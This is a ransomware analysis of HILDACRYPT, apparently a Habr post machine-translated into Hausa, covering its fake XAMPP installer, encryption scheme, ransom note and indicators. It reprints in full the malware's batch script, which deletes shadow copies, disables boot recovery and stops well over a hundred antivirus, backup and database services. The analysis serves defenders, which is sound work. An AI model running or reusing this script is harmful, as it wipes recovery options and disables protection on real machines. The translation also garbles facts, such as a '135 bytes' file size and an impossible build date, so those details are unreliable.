Hello, Habr! Har yanzu, muna magana ne game da sabbin nau'ikan malware daga rukunin Ransomware. HILDACRYPT sabon kayan fansa ne, memba na dangin Hilda da aka gano a watan Agusta 2019, mai suna bayan zane mai ban dariya na Netflix wanda aka yi amfani da shi don rarraba software. A yau muna saba da fasalolin fasaha na wannan sabuwar ƙwayar cuta ta ransomware.
A cikin sigar farko ta Hilda ransomware, hanyar haɗi zuwa wacce aka buga akan Youtube jerin zane mai ban dariya na ƙunshe a cikin wasiƙar fansa. HILDACRYPT masquerades azaman halaltaccen mai sakawa XAMPP, rarraba Apache mai sauƙin shigar da ya haɗa da MariaDB, PHP, da Perl. A lokaci guda, cryptolocker yana da sunan fayil daban - xamp. Bugu da kari, fayil ɗin ransomware bashi da sa hannun lantarki.
Bincike a tsaye
Ransomware yana ƙunshe a cikin fayil ɗin PE32 .NET da aka rubuta don MS Windows. Girmansa shine 135 bytes. Duka babban lambar shirin da lambar shirin tsaro an rubuta su a cikin C #. Dangane da kwanan wata da tambarin lokaci, an ƙirƙiri binary a ranar 168 ga Satumba, 14.
A cewar Detect It Easy, ana adana kayan fansa ne ta hanyar amfani da Confuser da ConfuserEx, amma waɗannan obfuscators iri ɗaya ne kamar da, ConfuserEx kaɗai ne magajin Confuser, don haka sa hannun lambar su iri ɗaya ne.
HILDACRYPT hakika an haɗa shi tare da ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Kai hari vector
Mafi mahimmanci, an gano kayan fansa a ɗaya daga cikin rukunin yanar gizon shirye-shiryen yanar gizo, wanda aka mayar da shi azaman halaltaccen shirin XAMPP.
Ana iya ganin dukkan sassan kamuwa da cuta a ciki .
Abun kunya
Ana adana igiyoyin ransomware a cikin rufaffen tsari. Lokacin da aka ƙaddamar da su, HILDACRYPT yana yanke su ta amfani da Base64 da AES-256-CBC.
saitin
Da farko dai, ransomware yana ƙirƙira babban fayil a cikin % AppDataRoaming% wanda a cikinsa aka ƙirƙiri ma'aunin GUID (Mai Idon Duniya na Musamman). Ta ƙara fayil ɗin jemage zuwa wannan wurin, ƙwayar ransomware ta ƙaddamar da shi ta amfani da cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & fita
Daga nan ya fara aiwatar da rubutun tsari don musaki fasali ko ayyuka na tsarin.
Rubutun ya ƙunshi dogon jerin umarni waɗanda ke lalata kwafin inuwa, kashe sabar SQL, madadin da mafita na riga-kafi.
Misali, yana ƙoƙarin dakatar da ayyukan Acronis Ajiyayyen bai yi nasara ba. Bugu da ƙari, yana kai hari ga tsarin ajiya da mafita na riga-kafi daga masu siyarwa masu zuwa: Veeam, Sophos, Kaspersky, McAfee da sauransu.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Da zarar an kashe ayyuka da matakai da aka ambata a sama, cryptolocker yana tattara bayanai game da duk hanyoyin tafiyar da aiki ta amfani da umarnin jerin ayyuka don tabbatar da cewa duk ayyukan da suka dace sun ragu.
jerin ayyuka v/fo csv
Wannan umarnin yana nuna cikakken jerin hanyoyin tafiyarwa, abubuwan da aka raba su da alamar “,” alamar.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Bayan wannan rajistan, ransomware zai fara aiwatar da ɓoyayyen ɓoyayyen.
Enciko
Rufin fayil
HILDACRYPT yana shiga cikin duk abubuwan da aka samo na rumbun kwamfyuta, ban da Recycle.Bin da Reference AssembliesMicrosoft. Ƙarshen ya ƙunshi mahimman fayilolin dll, pdb, da dai sauransu don aikace-aikacen .Net waɗanda zasu iya shafar aikin ransomware. Don nemo fayilolin da za a rufaffen, ana amfani da jerin abubuwan kari masu zuwa:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware yana amfani da AES-256-CBC algorithm don ɓoye fayilolin mai amfani. Girman maɓalli shine rago 256 kuma girman farawar vector (IV) shine bytes 16.
A cikin hoton da ke biyowa, an sami ƙimar byte_2 da byte_1 ba da gangan ta amfani da GetBytes().
Key
VI
Fayil ɗin da aka rufaffen yana da tsawo HCY!... Wannan misalin rufaffen fayil ne. Maɓalli da IV da aka ambata a sama an ƙirƙira su don wannan fayil ɗin.
Rufe maɓalli
Maɓallin crypto yana adana maɓallin AES da aka ƙirƙira a cikin ɓoyayyen fayil. Kashi na farko na fayil ɗin da aka rufaffen yana da rubutun kai wanda ya ƙunshi bayanai kamar HILDACRYPT, KEY, IV, FileLen a tsarin XML, kuma yayi kama da haka:
Ana yin ɓoyayyen maɓalli na AES da IV ta amfani da RSA-2048, kuma ana yin rufaffiyar ta amfani da Base64. Ana adana maɓalli na jama'a na RSA a cikin jikin cryptolocker a ɗaya daga cikin rufaffen kirtani a tsarin XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Ana amfani da maɓallin jama'a na RSA don ɓoye maɓallin fayil na AES. Maɓallin jama'a na RSA an ɓoye Base64 kuma ya ƙunshi modules da juzu'i na jama'a na 65537. Decryption yana buƙatar maɓallin keɓaɓɓen RSA, wanda maharin ke da shi.
Bayan rufaffen RSA, maɓallin AES yana ɓoye ta amfani da Base64 da aka adana a cikin rufaffen fayil ɗin.
Saƙon fansa
Da zarar boye-boye ya cika, HILDACRYPT yana rubuta fayil ɗin html zuwa babban fayil ɗin da ya ɓoye fayilolin. Sanarwar ransomware ta ƙunshi adiresoshin imel guda biyu inda wanda aka azabtar zai iya tuntuɓar maharin.
Sanarwar kwace kuma ta ƙunshi layin "Babu loli lafiya;)" - nuni ga haruffan anime da manga tare da bayyanar kananan 'yan mata da aka dakatar a Japan.
ƙarshe
HILDACRYPT, sabon dangin ransomware, sun fito da wani sabon salo. Samfurin ɓoyayyen ɓoyayyen yana hana wanda aka azabtar da shi daga ɓoyayyun fayilolin da ransomware ya rufaru. Cryptolocker yana amfani da hanyoyin kariya masu aiki don kashe sabis na kariya masu alaƙa da tsarin ajiya da mafita na riga-kafi. Marubucin HILDACRYPT mai sha'awar jerin shirye-shiryen Hilda ne da aka nuna akan Netflix, hanyar haɗi zuwa tirelar wanda ke ƙunshe a cikin wasiƙar siyan shirin da ya gabata.
Kamar yadda ya saba и na iya kare kwamfutarka daga HILDACRYPT ransomware, kuma masu samarwa suna da ikon kare abokan cinikin su da . Ana tabbatar da kariya ta gaskiyar cewa waɗannan mafita sun haɗa da ya haɗa da ba kawai madadin ba, har ma da tsarin tsaro na haɗin gwiwa - An ƙarfafa shi ta hanyar ƙirar koyan na'ura kuma ta dogara da ilimin halin ɗabi'a, fasahar da ke da ikon tinkarar barazanar ransomware na kwana-kwana kamar babu.
Manuniya na yin sulhu
Fayil na HCY!
HILDACRYPTKarantaMe.html
xamp.exe tare da harafi ɗaya "p" kuma babu sa hannun dijital
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
source: www.habr.com